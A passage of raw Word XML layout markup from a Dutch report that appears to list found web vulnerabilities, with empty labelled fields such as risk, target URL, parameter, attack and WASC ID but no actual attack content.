                  <wp:posOffset>967105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1587500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="673" name="Text Box 673"/>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88A38FE" w14:textId="3B737584" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                            <w:r>
                              <w:t>Klant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38CD1" id="Text Box 673" o:spid="_x0000_s1168" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.55pt;margin-top:76.15pt;width:125pt;height:18pt;z-index:2528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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="388A38FE" w14:textId="3B737584" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>Klant 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2048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5924383B" wp14:editId="772CEB11">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>740410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1587500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="12700" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="671" name="Text Box 671"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="15875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2DC44B91" w14:textId="383C9133" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Algemene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4383B" id="Text Box 671" o:spid="_x0000_s1169" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:58.3pt;width:125pt;height:18pt;z-index:2528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" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2DC44B91" w14:textId="383C9133" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Algemene informatie</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004D7CE2">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252781568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A3B4A3F" wp14:editId="683F7215">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-14605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="7997190"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21610"/>
                    <wp:lineTo x="21646" y="21610"/>
                    <wp:lineTo x="21646" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="659" name="Rectangle 659"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5905500" cy="7997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7A977" id="Rectangle 659" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1.15pt;margin-top:22.55pt;width:465pt;height:629.7pt;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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00431886">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pagina 1</w:t>
      </w:r>
      <w:r w:rsidR="00D422CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E587F7A" w14:textId="371BFFF0" w:rsidR="00B64191" w:rsidRDefault="00340E52">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253210624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10EEF160" wp14:editId="76806E2D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7216775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1460500" cy="229235"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="799" name="Text Box 799"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="146050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B0D4C" w14:textId="71CD69E6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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EF160" id="Text Box 799" o:spid="_x0000_s1170" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:568.25pt;width:115pt;height:18.05pt;z-index:2532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AaHXoCAABmBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI2xVYK1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="011B0D4C" w14:textId="71CD69E6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 4.22</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796928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A075061" wp14:editId="5F849A4E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>364490</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>793115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="1600200"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="667" name="Rectangle 667"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="304800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DC69" id="Rectangle 667" o:spid="_x0000_s1026" style="position:absolute;margin-left:28.7pt;margin-top:62.45pt;width:240pt;height:126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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E12294">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252845056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55D8B713" wp14:editId="3CF0088B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>428625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>909320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2921000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="723" name="Text Box 723"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2921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4C0F85" w14:textId="78652A28" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>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8B713" id="Text Box 723" o:spid="_x0000_s1171" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.75pt;margin-top:71.6pt;width:230pt;height:18pt;z-index:2528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" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="354C0F85" w14:textId="78652A28" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Advies</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49152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73F5108B" wp14:editId="367B8D7F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>494665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2847340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="233045"/>
                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="725" name="Text Box 725"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4441825" cy="233045"/>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AD48F4" w14:textId="5FBD61D1" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00B938E3">
                            <w:r>
                              <w:t>Details van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108B" id="Text Box 725" o:spid="_x0000_s1172" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:38.95pt;margin-top:224.2pt;width:349.75pt;height:18.3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" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15AD48F4" w14:textId="5FBD61D1" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00B938E3">
                      <w:r>
                        <w:t>Details van gevonden kwetsbaarheden</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0176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="165FDD98" wp14:editId="5F4007E4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>428625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1252220</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2921000" cy="1028700"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="733" name="Text Box 733"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2921000" cy="10287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8E44F2E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A0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FDD98" id="Text Box 733" o:spid="_x0000_s1173" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.75pt;margin-top:98.6pt;width:230pt;height:81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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="78E44F2E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"/>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2224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30C821EC" wp14:editId="21449620">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>494665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3197225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="734" name="Text Box 734"/>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B20F3C" w14:textId="45C57126" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">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21EC" id="Text Box 734" o:spid="_x0000_s1174" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:38.95pt;margin-top:251.75pt;width:349.75pt;height:17.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="57B20F3C" w14:textId="45C57126" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>ID</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4272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CC8B5CF" wp14:editId="249C7516">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3536315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="735" name="Text Box 735"/>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F210BFA" w14:textId="1FCA797D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w: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B5CF" id="Text Box 735" o:spid="_x0000_s1175" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:278.45pt;width:349.75pt;height:17.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1F210BFA" w14:textId="1FCA797D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Module</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6320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71A18751" wp14:editId="5626ABDF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3879215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="736" name="Text Box 736"/>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36647A6" w14:textId="7A53F7FD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w:r>
                              <w:t>Ri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8751" id="Text Box 736" o:spid="_x0000_s1176" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:305.45pt;width:349.75pt;height:17.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="536647A6" w14:textId="7A53F7FD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Risico</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8368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79B65CE2" wp14:editId="786F052E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4222115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="737" name="Text Box 737"/>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D88FC83" w14:textId="112D0BB4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w:r>
                              <w:t>Target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5CE2" id="Text Box 737" o:spid="_x0000_s1177" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:332.45pt;width:349.75pt;height:17.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D88FC83" w14:textId="112D0BB4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Target URL</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0416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EDDB56D" wp14:editId="4F9DEBE1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4565015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="738" name="Text Box 738"/>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29004AA" w14:textId="29AB3D00" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w: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B56D" id="Text Box 738" o:spid="_x0000_s1178" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:359.45pt;width:349.75pt;height:17.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="029004AA" w14:textId="29AB3D00" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Parameter</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2464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08C235AF" wp14:editId="631C4C09">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4907915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="739" name="Text Box 739"/>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FB10490" w14:textId="52C49923" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w:r>
                              <w:t>Aan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35AF" id="Text Box 739" o:spid="_x0000_s1179" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:386.45pt;width:349.75pt;height:17.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6FB10490" w14:textId="52C49923" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Aanval</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4512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44F4C331" wp14:editId="18147013">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5250815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="740" name="Text Box 740"/>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27CAEDE" w14:textId="7648861C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w: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C331" id="Text Box 740" o:spid="_x0000_s1180" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:413.45pt;width:349.75pt;height:17.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="627CAEDE" w14:textId="7648861C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Error</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6560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DE7942B" wp14:editId="0DE7FE53">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5593715</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="741" name="Text Box 741"/>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BD36E3" w14:textId="2069F6D2" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w:r>
                              <w:t>WASC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942B" id="Text Box 741" o:spid="_x0000_s1181" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:440.45pt;width:349.75pt;height:17.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FBD36E3" w14:textId="2069F6D2" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>WASC ID</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8608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A58E16C" wp14:editId="54459EC0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5936615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="742" name="Text Box 742"/>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E515D70" w14:textId="6E2C4ADF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w:r>
                              <w:t>Me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E16C" id="Text Box 742" o:spid="_x0000_s1182" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:467.45pt;width:349.75pt;height:17.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0E515D70" w14:textId="6E2C4ADF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Methode</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70656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="070A9318" wp14:editId="0711E332">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6279515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4441825" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="28575" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="743" name="Text Box 743"/>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F9160D7" w14:textId="6FDF8D61" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                            <w: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9318" id="Text Box 743" o:spid="_x0000_s1183" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.1pt;margin-top:494.45pt;width:349.75pt;height:17.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5F9160D7" w14:textId="6FDF8D61" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Datum</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798976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="093DDF6B" wp14:editId="7739FFA9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>368300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2740025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4635500" cy="3997960"/>
                <wp:effectExtent l="0" t="0" r="38100" b="15240"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21545"/>
                    <wp:lineTo x="21659" y="21545"/>
                    <wp:lineTo x="21659" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="668" name="Rectangle 668"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4635500" cy="399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EDA01" id="Rectangle 668" o:spid="_x0000_s1026" style="position:absolute;margin-left:29pt;margin-top:215.75pt;width:365pt;height:314.8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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E12294">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252794880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B158D0D" wp14:editId="39AB2F15">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>356870</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="6838315"/>
                <wp:effectExtent l="0" t="0" r="38100" b="19685"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21582"/>
                    <wp:lineTo x="21646" y="21582"/>
                    <wp:lineTo x="21646" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="666" name="Rectangle 666"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5905500" cy="6838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3542B" id="Rectangle 666" o:spid="_x0000_s1026" style="position:absolute;margin-left:-.85pt;margin-top:28.1pt;width:465pt;height:538.4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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00544774">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252792832" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12581A06" wp14:editId="015875C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899327</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-900463</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
